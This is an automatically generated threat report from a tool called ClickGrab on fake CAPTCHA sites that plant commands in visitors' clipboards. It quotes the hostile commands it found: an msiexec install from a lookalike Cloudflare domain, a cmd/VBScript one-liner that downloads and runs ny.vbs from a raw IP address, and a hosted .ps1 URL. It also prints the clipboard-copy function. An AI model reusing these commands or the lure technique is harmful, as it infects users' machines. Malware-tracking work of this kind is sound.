ClickGrab Threat Analysis Report - 2025-12-23
Generated on 2025-12-23 02:49:33
Executive Summary
- Total sites analyzed: 23
- Sites with malicious content: 4
- Unique domains encountered: 31
- Total URLs extracted: 89
- PowerShell download attempts: 1
- Clipboard manipulation instances: 22
Domain Analysis
Most Frequently Encountered Domains
- www.webgo.de: 10 occurrences
- godprox.cc: 8 occurrences
- svetvip.ru: 8 occurrences
- www.google.com: 7 occurrences
- t.me: 6 occurrences
- api.whatsapp.com: 6 occurrences
- mc.yandex.ru: 4 occurrences
- i.postimg.cc: 3 occurrences
- icons.duckduckgo.com: 3 occurrences
- ${host}: 3 occurrences
- www.thawte.com: 2 occurrences
- www.digicert.com: 2 occurrences
- use.fontawesome.com: 2 occurrences
- vk.com: 2 occurrences
- www.facebook.com: 2 occurrences
URL Pattern Analysis
reCAPTCHA imagery
2 occurrences across 1 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)
Font resources
2 occurrences across 1 distinct URLs
https://use.fontawesome.com/releases/v5.0.0/css/all.css(2 times)
CDN hosted scripts
1 occurrences across 1 distinct URLs
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1(1 times)
Google resources
7 occurrences across 4 distinct URLs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent(3 times)https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)https://www.google.com/intl/en/policies/privacy/(1 times)https://www.google.com/intl/en/policies/terms/(1 times)
Suspicious Keyword Analysis
Total Keywords Found: 81 (35 unique)
Keyword Categories
Social Engineering
17 unique keywords
Checking if you are humancommand = "msiexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";I am not a robotrobotTo better prove you are not a robotVerify you are humanRobotverificationverification-idverification_id- ...and 7 more
Obfuscation Indicators
1 unique keywords
Command iine: [2]RemoveFiiesRemoving fiiesRemoveIniVaiuesRemoving INI fiies entriesRemoveODBCRemoving ODBC componentsSeifRegModuiesRegistering moduiesFiie: [i], Foider: [2]RemoveShortcutsRemoving shortcutsSeifUnregModuiesUnregistering moWY[�\�_b�ceg��di�jimo�hpquruvwy{|}~������������������#�����-�&��)�������K ����.���aZ���^������z�����[�����A�������������� `
System Commands
7 unique keywords
cmdinvokecmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';const command =command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';exec(exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)
Verification Text
3 unique keywords
hiddenHiddenray id
Technical Terms
7 unique keywords
failed_to_retrieve.exeRay IDiexbitmap.EXEBitmap
Most Frequent Keywords
- robot: 6 occurrences
- hidden: 6 occurrences
- failed_to_retrieve: 6 occurrences
- CAPTCHA Verification: 4 occurrences
- I am not a robot: 4 occurrences
- Robot: 4 occurrences
- Verification: 4 occurrences
- verification: 4 occurrences
- verification-id: 4 occurrences
- To better prove you are not a robot: 4 occurrences
- Verification ID: 3 occurrences
- verification_id: 2 occurrences
- iex: 2 occurrences
- exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.rv:([0-9]+[.0-9])");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator): 2 occurrences
- exec(: 2 occurrences
Similar Keyword Patterns
Groups of keywords that appear to be variations of the same theme:
Group 1: .EXE, .exe
Group 2: Bitmap, bitmap
Group 3: CAPTCHA Verification, Verification, verification
Group 4: Verification Hash, verification-id, verification_id, Verification ID, verification id
Group 5: Robot, robot
JavaScript Obfuscation Analysis
Obfuscation Sophistication Score: 0/7
Potential Base64 Encoded Content
These strings may contain encoded malicious payloads:
shortcutsSeifUnregModuiesUnregistering0ad958b2e6726411ae22a656b01e94f40ff0e293f85e2a01e55afa93b71cd42ecom/recaptcha/about/images/reCAPTCHA/bitrix/tools/captcha
Clipboard Manipulation Analysis
Detected clipboard manipulation in 22 instances.
Document.Execcommand Copy
Found in 13 snippets (59.1% of clipboard code)
Examples:
try { document.execCommand('copy')
document.execCommand("copy")
Textarea Manipulation
Found in 13 snippets (59.1% of clipboard code)
Examples:
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
tListener("click", function () { const textarea = document.createElement('textarea'
ng is the safe placeholder above const textarea = document.createElement('textarea'
Complete Malicious Functions
Function 1:
function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }
Report truncated for web display. Full data available in JSON.